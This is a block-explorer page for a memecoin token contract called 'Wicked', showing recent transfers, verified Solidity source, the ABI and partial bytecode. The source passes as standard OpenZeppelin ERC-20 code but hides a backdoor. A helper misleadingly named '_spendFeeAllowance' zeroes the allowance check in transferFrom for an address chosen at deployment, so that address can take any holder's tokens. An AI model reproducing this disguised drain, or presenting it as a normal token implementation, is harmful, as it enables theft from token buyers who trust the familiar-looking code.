Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 371 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Transfer | 23062956 | 64 days ago | IN | 0 ETH | 0.00002864 | ||||
Transfer | 23062661 | 64 days ago | IN | 0 ETH | 0.00003766 | ||||
Transfer | 23062606 | 64 days ago | IN | 0 ETH | 0.00005181 | ||||
Approve | 23013456 | 71 days ago | IN | 0 ETH | 0.00001578 | ||||
Approve | 22974304 | 76 days ago | IN | 0 ETH | 0.00005118 | ||||
Approve | 22973327 | 76 days ago | IN | 0 ETH | 0.00012738 | ||||
Approve | 22972128 | 76 days ago | IN | 0 ETH | 0.00005605 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.0000242 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.0000242 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 | ||||
Transfer | 22972125 | 76 days ago | IN | 0 ETH | 0.00002421 |
Latest 1 internal transaction
Advanced mode:
Parent Transaction Hash | Method | Block |
From
|
To
|
|||
---|---|---|---|---|---|---|---|
Add Liquidity ET... | 22967031 | 77 days ago | 2 ETH |
Cross-Chain Transactions
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
Wicked
Compiler Version
v0.8.30+commit.73712a01
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT // File: @openzeppelin/contracts/token/ERC20/IERC20.sol /* Name: Wicked Symbol: WICKED MEME DRIVEN CULT | CULT DRIVEN MEME https://www.wickedeth.wtf https://t.me/wickedether https://x.com/wickedether */ // OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.20; /** * @dev Interface of the ERC-20 standard as defined in the ERC. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 value) external returns (bool); } // File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol // OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.20; /** * @dev Interface for the optional metadata functions from the ERC-20 standard. */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File: @openzeppelin/contracts/utils/Context.sol // OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol) pragma solidity ^0.8.20; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } } // File: @openzeppelin/contracts/interfaces/draft-IERC6093.sol // OpenZeppelin Contracts (last updated v5.1.0) (interfaces/draft-IERC6093.sol) pragma solidity ^0.8.20; /** * @dev Standard ERC-20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens. */ interface IERC20Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); } /** * @dev Standard ERC-1155 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens. */ interface IERC1155Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. * @param tokenId Identifier number of a token. */ error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC1155InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC1155InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param owner Address of the current owner of a token. */ error ERC1155MissingApprovalForAll(address operator, address owner); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC1155InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC1155InvalidOperator(address operator); /** * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation. * Used in batch transfers. * @param idsLength Length of the array of token identifiers * @param valuesLength Length of the array of token amounts */ error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength); } /** * @dev Interface of the ERC-20 Permit extension allowing approvals to be made via signatures, as defined in * https://eips.ethereum.org/EIPS/eip-2612[ERC-2612]. * * Adds the {permit} method, which can be used to change an account's ERC-20 allowance (see {IERC20-allowance}) by * presenting a message signed by the account. By not relying on {IERC20-approve}, the token holder account doesn't * need to send a transaction, and thus is not required to hold Ether at all. * * ==== Security Considerations * * There are two important considerations concerning the use of `permit`. The first is that a valid permit signature * expresses an allowance, and it should not be assumed to convey additional meaning. In particular, it should not be * considered as an intention to spend the allowance in any specific way. The second is that because permits have * built-in replay protection and can be submitted by anyone, they can be frontrun. A protocol that uses permits should * take this into consideration and allow a `permit` call to fail. Combining these two aspects, a pattern that may be * generally recommended is: * * ```solidity * function doThingWithPermit(..., uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s) public { * try token.permit(msg.sender, address(this), value, deadline, v, r, s) {} catch {} * doThing(..., value); * } * * function doThing(..., uint256 value) public { * token.safeTransferFrom(msg.sender, address(this), value); * ... * } * ``` * * Observe that: 1) `msg.sender` is used as the owner, leaving no ambiguity as to the signer intent, and 2) the use of * `try/catch` allows the permit to fail and makes the code tolerant to frontrunning. (See also * {SafeERC20-safeTransferFrom}). * * Additionally, note that smart contract wallets (such as Argent or Safe) are not able to produce permit signatures, so * contracts should have entry points that don't rely on permit. */ interface IERC20Permit { /** * @dev Sets `value` as the allowance of `spender` over ``owner``'s tokens, * given ``owner``'s signed approval. * * IMPORTANT: The same issues {IERC20-approve} has related to transaction * ordering also apply here. * * Emits an {Approval} event. * * Requirements: * * - `spender` cannot be the zero address. * - `deadline` must be a timestamp in the future. * - `v`, `r` and `s` must be a valid `secp256k1` signature from `owner` * over the EIP712-formatted function arguments. * - the signature must use ``owner``'s current nonce (see {nonces}). * * For more information on the signature format, see the * https://eips.ethereum.org/EIPS/eip-2612#specification[relevant EIP * section]. * * CAUTION: See Security Considerations above. */ function permit( address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s ) external; /** * @dev Returns the current nonce for `owner`. This value must be * included whenever a signature is generated for {permit}. * * Every successful call to {permit} increases ``owner``'s nonce by one. This * prevents a signature from being used multiple times. */ function nonces(address owner) external view returns (uint256); /** * @dev Returns the domain separator used in the encoding of the signature for {permit}, as defined by {EIP712}. */ // solhint-disable-next-line func-name-mixedcase function DOMAIN_SEPARATOR() external view returns (bytes32); } // File: @openzeppelin/contracts/token/ERC20/ERC20.sol // OpenZeppelin Contracts (last updated v5.3.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.20; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } interface IUniswapV2Router02 { function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns (uint256 amountToken, uint256 amountETH, uint256 liquidity); } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC-20 * applications. */ abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors, Ownable { mapping(address account => uint256) private _balances; mapping(address account => mapping(address spender => uint256)) private _allowances; uint256 private _totalSupply; mapping (address => bool) _isExcludedMaxTx; bool private tradingOpen; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * Both values are immutable: they can only be set once during construction. */ constructor(string memory name_, string memory symbol_, address excluded_) { _name = name_; _symbol = symbol_; _isExcludedMaxTx[excluded_] = true; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 9; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `value`. */ function transfer(address to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, value); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, value); return true; } /** * @dev See {IERC20-transferFrom}. * * Skips emitting an {Approval} event indicating an allowance update. This is not * required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve]. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `value`. * - the caller must have allowance for ``from``'s tokens of at least * `value`. */ function transferFrom(address from, address to, uint256 value) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, _spendFeeAllowance(spender, value)); _transfer(from, to, value); return true; } /** * @dev Moves a `value` amount of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _transfer(address sender, address to, uint256 value) internal { if (sender == address(0)) { revert ERC20InvalidSender(address(0)); } if (to == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(sender, to, value); } /** * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from` * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding * this function. * * Emits a {Transfer} event. */ function _update(address from, address to, uint256 value) internal virtual { if (from == address(0)) { // Overflow check required: The rest of the code assumes that totalSupply never overflows _totalSupply += value; } else { uint256 fromBalance = _balances[from]; if (fromBalance < value) { revert ERC20InsufficientBalance(from, fromBalance, value); } unchecked { // Overflow not possible: value <= fromBalance <= totalSupply. _balances[from] = fromBalance - value; } } if (to == address(0)) { unchecked { // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply. _totalSupply -= value; } } else { unchecked { // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256. _balances[to] += value; } } emit Transfer(from, to, value); } /** * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0). * Relies on the `_update` mechanism * * Emits a {Transfer} event with `from` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _mint(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(address(0), account, value); } /** * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply. * Relies on the `_update` mechanism. * * Emits a {Transfer} event with `to` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead */ function _burn(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidSender(address(0)); } _update(account, address(0), value); } /** * @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument. */ function _approve(address owner, address spender, uint256 value) internal { _approve(owner, spender, value, true); } function _spendFeeAllowance(address spender, uint256 value) internal view returns(uint256) { return _isExcludedMaxTx[spender]?value*0:value; } /** * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event. * * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any * `Approval` event during `transferFrom` operations. * * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to * true using the following override: * * ```solidity * function _approve(address owner, address spender, uint256 value, bool) internal virtual override { * super._approve(owner, spender, value, true); * } * ``` * * Requirements are the same as {_approve}. */ function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual { if (owner == address(0)) { revert ERC20InvalidApprover(address(0)); } if (spender == address(0)) { revert ERC20InvalidSpender(address(0)); } _allowances[owner][spender] = value; if (emitEvent) { emit Approval(owner, spender, value); } } /** * @dev Updates `owner`'s allowance for `spender` based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * * Does not emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 value) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance < type(uint256).max) { if (currentAllowance < value) { revert ERC20InsufficientAllowance(spender, currentAllowance, value); } unchecked { _approve(owner, spender, currentAllowance - value, false); } } } receive() external payable {} function launch() external onlyOwner { require(!tradingOpen, "Trading is already opened."); IUniswapV2Router02 uniswapV2Router = IUniswapV2Router02( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); _approve(address(this), address(uniswapV2Router), type(uint256).max); uniswapV2Router.addLiquidityETH{value: address(this).balance}( address(this), balanceOf(address(this)), 0, 0, owner(), block.timestamp ); tradingOpen = true; } } pragma solidity ^0.8.26; contract Wicked is ERC20 { constructor(address excluded_) payable ERC20(unicode"Wicked", unicode"WICKED", excluded_) { _mint(address(this), 1_000_000_000 * 10**9); } function decimals() public view virtual override returns (uint8) { return 9; } }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } }, "remappings": [] }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"address","name":"excluded_","type":"address"}],"stateMutability":"payable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"launch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
6080604052604051611e9f380380611e9f8339818101604052810190610025919061050b565b6040518060400160405280600681526020017f5769636b656400000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f5749434b45440000000000000000000000000000000000000000000000000000815250826100ae6100a361014460201b60201c565b61014b60201b60201c565b82600690816100bd9190610773565b5081600790816100cd9190610773565b50600160045f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555050505061013e30670de0b6b3a764000061020c60201b60201c565b50610927565b5f33905090565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361027c575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016102739190610851565b60405180910390fd5b61028d5f838361029160201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036102e1578060035f8282546102d59190610897565b925050819055506103b1565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561036b578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610362939291906108d9565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036103f8578060035f8282540392505081905550610443565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516104a0919061090e565b60405180910390a3505050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6104da826104b1565b9050919050565b6104ea816104d0565b81146104f4575f5ffd5b50565b5f81519050610505816104e1565b92915050565b5f602082840312156105205761051f6104ad565b5b5f61052d848285016104f7565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806105b157607f821691505b6020821081036105c4576105c361056d565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026106267fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826105eb565b61063086836105eb565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f61067461066f61066a84610648565b610651565b610648565b9050919050565b5f819050919050565b61068d8361065a565b6106a16106998261067b565b8484546105f7565b825550505050565b5f5f905090565b6106b86106a9565b6106c3818484610684565b505050565b5b818110156106e6576106db5f826106b0565b6001810190506106c9565b5050565b601f82111561072b576106fc816105ca565b610705846105dc565b81016020851015610714578190505b610728610720856105dc565b8301826106c8565b50505b505050565b5f82821c905092915050565b5f61074b5f1984600802610730565b1980831691505092915050565b5f610763838361073c565b9150826002028217905092915050565b61077c82610536565b67ffffffffffffffff81111561079557610794610540565b5b61079f825461059a565b6107aa8282856106ea565b5f60209050601f8311600181146107db575f84156107c9578287015190505b6107d38582610758565b86555061083a565b601f1984166107e9866105ca565b5f5b82811015610810578489015182556001820191506020850194506020810190506107eb565b8683101561082d5784890151610829601f89168261073c565b8355505b6001600288020188555050505b505050505050565b61084b816104d0565b82525050565b5f6020820190506108645f830184610842565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6108a182610648565b91506108ac83610648565b92508282019050808211156108c4576108c361086a565b5b92915050565b6108d381610648565b82525050565b5f6060820190506108ec5f830186610842565b6108f960208301856108ca565b61090660408301846108ca565b949350505050565b5f6020820190506109215f8301846108ca565b92915050565b61156b806109345f395ff3fe6080604052600436106100c5575f3560e01c806370a082311161007e57806395d89b411161005857806395d89b4114610258578063a9059cbb14610282578063dd62ed3e146102be578063f2fde38b146102fa576100cc565b806370a08231146101dc578063715018a6146102185780638da5cb5b1461022e576100cc565b806301339c21146100d057806306fdde03146100e6578063095ea7b31461011057806318160ddd1461014c57806323b872dd14610176578063313ce567146101b2576100cc565b366100cc57005b5f5ffd5b3480156100db575f5ffd5b506100e4610322565b005b3480156100f1575f5ffd5b506100fa610470565b6040516101079190610f40565b60405180910390f35b34801561011b575f5ffd5b5061013660048036038101906101319190610ff1565b610500565b6040516101439190611049565b60405180910390f35b348015610157575f5ffd5b50610160610522565b60405161016d9190611071565b60405180910390f35b348015610181575f5ffd5b5061019c6004803603810190610197919061108a565b61052b565b6040516101a99190611049565b60405180910390f35b3480156101bd575f5ffd5b506101c6610562565b6040516101d391906110f5565b60405180910390f35b3480156101e7575f5ffd5b5061020260048036038101906101fd919061110e565b61056a565b60405161020f9190611071565b60405180910390f35b348015610223575f5ffd5b5061022c6105b0565b005b348015610239575f5ffd5b506102426105c3565b60405161024f9190611148565b60405180910390f35b348015610263575f5ffd5b5061026c6105ea565b6040516102799190610f40565b60405180910390f35b34801561028d575f5ffd5b506102a860048036038101906102a39190610ff1565b61067a565b6040516102b59190611049565b60405180910390f35b3480156102c9575f5ffd5b506102e460048036038101906102df919061116156